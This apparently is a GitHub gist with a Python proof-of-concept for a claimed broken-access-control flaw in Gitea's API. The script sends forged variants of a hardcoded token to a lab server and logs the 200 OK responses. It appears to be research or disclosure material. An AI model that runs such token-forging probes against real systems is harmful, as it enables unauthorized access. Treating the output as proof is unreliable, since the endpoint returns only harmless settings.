Skip to content

Instantly share code, notes, and snippets.

@HouqiyuA

HouqiyuA/gist:81bcd0f7c408c80d831d465929a555ec

Created September 22, 2025 12:18
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save HouqiyuA/81bcd0f7c408c80d831d465929a555ec to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save HouqiyuA/81bcd0f7c408c80d831d465929a555ec to your computer and use it in GitHub Desktop.
Download ZIP
gitea-broken access control
Raw
gistfile1.txt
import requests
import json
import time
# Target configuration
host = "192.168.126.129"
port = 3000
base_url = f"http://{host}:{port}"
# Original token from the sample
auth_token = "c3a9402a254ac8d1cd64c9847212a410a85f3735"
# Headers with the authorization token
headers = {
"Accept": "application/json",
"Authorization": auth_token
}
def print_request_response_info(response, request_description):
print(f"\n=== {request_description} ===")
print(f"Request URL: {response.url}")
print(f"Request Headers: {json.dumps(dict(response.request.headers), indent=2)}")
print(f"Response Status: {response.status_code} {response.reason}")
print(f"Response Headers: {json.dumps(dict(response.headers), indent=2)}")
print(f"Response Body: {response.text}")
def test_token_patterns():
# Check if token follows common patterns
patterns_to_test = [
auth_token[:16] + "a"*20, # First half preserved
"a"*16 + auth_token[16:], # Second half preserved
auth_token[:-1] + "0", # Last character changed
auth_token[0] + "a"*39 # First character preserved
]
for i, pattern in enumerate(patterns_to_test):
test_headers = headers.copy()
test_headers["Authorization"] = pattern
url = f"{base_url}/api/v1/settings/repository"
response = requests.get(url, headers=test_headers)
print_request_response_info(response, f"Token Pattern Test #{i+1}")
if __name__ == "__main__":
print("Starting Extended API Vulnerability Tests...")
# Run extended tests
test_token_patterns()
print("\nExtended testing completed.")
""""
PS E:\论文\模糊测试\RESTAPI\LLMfuzzapi\Poc\gitea> python .\insecure_access_control.py
Starting Extended API Vulnerability Tests...
=== Token Pattern Test #1 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "c3a9402a254ac8d1aaaaaaaaaaaaaaaaaaaa"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=01177b6c81d9bf99; Path=/; HttpOnly, _csrf=xeFQQlirIj8Sqv-F6DT-y9bcqvk6MTc0OTUyMDMxMjA0NjAwMjQ1NQ; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #2 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "aaaaaaaaaaaaaaaacd64c9847212a410a85f3735"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=12664da3df5f9244; Path=/; HttpOnly, _csrf=FTUPYdVzVgXlMlpdXHQ751m5GyE6MTc0OTUyMDMxMjA5MTY3NTIwMw; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #3 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "c3a9402a254ac8d1cd64c9847212a410a85f3730"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=d994d223e837947c; Path=/; HttpOnly, _csrf=3oU8Xw-ND8nNxdQDOzBr8T-Ka7A6MTc0OTUyMDMxMjA5NDY5NTMzNA; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #4 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "caaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=bb3dc831b0cec08a; Path=/; HttpOnly, _csrf=589Kj0RJSztmu3YJPCbgH1Hlris6MTc0OTUyMDMxMjA5NzczMjIyOA; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
Extended testing completed.
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment